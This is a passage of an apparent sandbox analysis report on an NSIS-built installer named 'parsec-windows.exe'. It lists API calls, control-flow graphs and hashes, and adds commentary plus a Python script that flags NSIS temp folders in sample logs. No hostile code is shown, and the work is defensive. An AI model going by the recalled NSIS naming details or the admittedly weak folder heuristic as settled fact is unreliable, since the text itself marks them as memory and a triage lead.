                                • String ID: 0x000017F5$Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                • API String ID: 4260037668-716171807
                                • Opcode ID: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                • Opcode Fuzzy Hash: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

                                 Control-flow Graph (legend in the original report: Executed / Not Executed)
                                control_flow_graph 748 40176f-401794 call 402da6 call 405e83 753 401796-40179c call 40653d 748->753 754 40179e-4017b0 call 40653d call 405e0c lstrcatW 748->754 759 4017b5-4017b6 call 4067c4 753->759 754->759 763 4017bb-4017bf 759->763 764 4017c1-4017cb call 406873 763->764 765 4017f2-4017f5 763->765 772 4017dd-4017ef 764->772 773 4017cd-4017db CompareFileTime 764->773 766 4017f7-4017f8 call 406008 765->766 767 4017fd-401819 call 40602d 765->767 766->767 775 40181b-40181e 767->775 776 40188d-4018b6 call 40559f call 4032b4 767->776 772->765 773->772 777 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 775->777 778 40186f-401879 call 40559f 775->778 788 4018b8-4018bc 776->788 789 4018be-4018ca SetFileTime 776->789 777->763 810 401864-401865 777->810 790 401882-401888 778->790 788->789 792 4018d0-4018db CloseHandle 788->792 789->792 793 402c33 790->793 796 4018e1-4018e4 792->796 797 402c2a-402c2d 792->797 798 402c35-402c39 793->798 800 4018e6-4018f7 call 40657a lstrcatW 796->800 801 4018f9-4018fc call 40657a 796->801 797->793 807 401901-4023a2 call 405b9d 800->807 801->807 807->797 807->798 810->790 812 401867-401868 810->812 812->778
                                APIs
                                • lstrcatW.KERNEL32(00000000,00000000,"C:\Program Files\Parsec\parsecd.exe",C:\Program Files\Parsec,?,?,00000031), ref: 004017B0
                                • CompareFileTime.KERNEL32(-00000014,?,"C:\Program Files\Parsec\parsecd.exe","C:\Program Files\Parsec\parsecd.exe",00000000,00000000,"C:\Program Files\Parsec\parsecd.exe",C:\Program Files\Parsec,?,?,00000031), ref: 004017D5
                                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00403418,00403418,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,00000000,00424620,74DF23A0), ref: 004055FA
                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\), ref: 0040560C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                 Memory Dump Source
                                 • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                • String ID: "C:\Program Files\Parsec\parsecd.exe"$C:\Program Files\Parsec$C:\Program Files\Parsec
                                • API String ID: 1941528284-119262318
                                • Opcode ID: 4839ee79086c8b8022f98973fbd435c3aafa34f7a6cbb40833a8578369c14881
                                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                • Opcode Fuzzy Hash: 4839ee79086c8b8022f98973fbd435c3aafa34f7a6cbb40833a8578369c14881
                                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D

                                Control-flow Graph

                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                • CloseHandle.KERNELBASE(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                • String ID:
                                • API String ID: 2667972263-0
                                • Opcode ID: b08a2a5b1b2e1d0bcef1cc982031fdde2dbf0f80dbef9f93f85a0cd55b57b722
                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                • Opcode Fuzzy Hash: b08a2a5b1b2e1d0bcef1cc982031fdde2dbf0f80dbef9f93f85a0cd55b57b722
                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

                                 Control-flow Graph (legend in the original report: Executed / Not Executed)
                                control_flow_graph 871 405a6e-405ab9 CreateDirectoryW 872 405abb-405abd 871->872 873 405abf-405acc GetLastError 871->873 874 405ae6-405ae8 872->874 873->874 875 405ace-405ae2 SetFileSecurityW 873->875 875->872 876 405ae4 GetLastError 875->876 876->874
                                APIs
                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                • GetLastError.KERNEL32 ref: 00405AC5
                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                • GetLastError.KERNEL32 ref: 00405AE4
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 3449924974-3081826266
                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
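This function creates a directory under C:\Users\user\AppData\Local\Temp\ and then calls SetFileSecurityW with SECURITY_INFORMATION 0x80000007, which decodes to OWNER (0x1) | GROUP (0x2) | DACL (0x4) | PROTECTED_DACL (0x80000000): the stock NSIS stub locking down its plugin/extraction directory so that other accounts cannot plant DLLs in it. The directory is the one whose name appears in the "Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\" strings above, and it is produced by the GetTickCount plus GetTempFileNameW pair listed later for function 0040607A with the "nsa" string. As I recall NSIS's my_GetTempFileName(), the prefix passed to GetTempFileNameW is "ns" followed by a letter chosen from GetTickCount() modulo 26, and GetTempFileNameW appends up to four hex digits and ".tmp". The following Python is an added hunting example, not code from the report or from NSIS; it turns that naming scheme into a pattern and groups files written under such directories. The log lines are constructed sample input in a Sysmon-like path-per-line shape, not events from this analysis.

```python
import re

# NSIS temp directory name: "ns" + one lowercase letter (tick-count derived)
# + up to four hex digits from GetTempFileName + ".tmp". Group 1 is the name.
NSIS_TEMP_DIR = re.compile(r"[\\/](ns[a-z][0-9A-Fa-f]{1,4}\.tmp)(?=[\\/]|$)")

# Constructed sample log lines (not from the report): "<event> <path>" per line.
SAMPLE_LOG = """\
FileCreate C:\\Users\\user\\AppData\\Local\\Temp\\nsvA814.tmp\\System.dll
FileCreate C:\\Users\\user\\AppData\\Local\\Temp\\nsvA814.tmp\\nsExec.dll
FileCreate C:\\Users\\user\\AppData\\Roaming\\PSecWin\\parsec-windows.exe
FileCreate C:\\Program Files\\Parsec\\parsecd.exe
FileCreate C:\\Users\\user\\AppData\\Local\\Temp\\nsExec.tmp\\x.dll
FileCreate C:\\Windows\\Temp\\nsk1F3C.tmp\\plugin.dll
"""


def nsis_temp_dirs(log_text):
    """Map each NSIS-style temp directory name to the paths written under it.

    Lines whose path contains no ns?XXXX.tmp component are ignored; a name such
    as nsExec.tmp does not match because the third character must be a
    lowercase letter followed only by hex digits.
    """
    hits = {}
    for line in log_text.splitlines():
        m = NSIS_TEMP_DIR.search(line)
        if m is None:
            continue
        child = line[m.end():].strip("\\/")      # e.g. "System.dll"
        hits.setdefault(m.group(1), []).append(child)
    return hits


def looks_like_plugin_drop(hits):
    """Temp directories that received at least one DLL, sorted by name.

    NSIS extracts its plugin DLLs into this directory before calling them, so a
    DLL written here is the expected pattern; it is a pivot for further triage,
    not a verdict, because every NSIS-built installer behaves the same way.
    """
    return sorted(name for name, files in hits.items()
                  if any(f.lower().endswith(".dll") for f in files))


if __name__ == "__main__":
    found = nsis_temp_dirs(SAMPLE_LOG)
    for name, files in found.items():
        print(name, files)
    print("plugin drops:", looks_like_plugin_drop(found))
```

Because this installer is an NSIS build of the Parsec client, the same directory pattern will also appear for the legitimate Parsec installer; what distinguishes the sample is what else it does around that directory, not the directory itself.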
                                APIs
                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                 Memory Dump Source
                                 • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                APIs
                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                • wsprintfW.USER32 ref: 00404DF0
                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                 Memory Dump Source
                                 • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 0000000C.00000002.2125991256.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126040311.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126070552.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 0000000C.00000002.2126234554.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: ef5a487acd93c416279d422af54232d8d0333c49029b07dfc4f1175e68c26d0a
                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                • Opcode Fuzzy Hash: ef5a487acd93c416279d422af54232d8d0333c49029b07dfc4f1175e68c26d0a
                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                APIs
                                • GetTickCount.KERNEL32 ref: 0040607A
                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                • API String ID: 1716503409-678247507
                                APIs
                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Remove folder: ,?,?,00406672,80000002), ref: 00406451
                                • RegCloseKey.KERNELBASE(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Remove folder: ,Remove folder: ,Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\), ref: 0040645C
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID: Remove folder:
                                • API String ID: 3356406503-1958208860
                                APIs
                                • FreeLibrary.KERNELBASE(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: Free$GlobalLibrary
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 1100898210-3081826266
                                APIs
                                  • Part of subcall function 00406008: GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                  • Part of subcall function 00406008: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C1C
                                • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C24
                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C3C
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: File$Attributes$DeleteDirectoryRemove
                                • String ID:
                                • API String ID: 1655745494-0
                                APIs
                                • SendMessageW.USER32(00000408,?,00000000,004040D1), ref: 00404490
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: x
                                • API String ID: 3850602802-2363233923
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 00405682
                                  • Part of subcall function 004044E5: SendMessageW.USER32(000A0296,00000000,00000000,00000000), ref: 004044F7
                                • CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 004056CE
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: InitializeMessageSendUninitialize
                                • String ID:
                                • API String ID: 2896919175-0
                                APIs
                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406900
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                • String ID:
                                • API String ID: 2547128583-0
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                Memory Dump Source
                                • Source File: 0000000C.00000002.2126016366.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_400000_parsec-windows.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0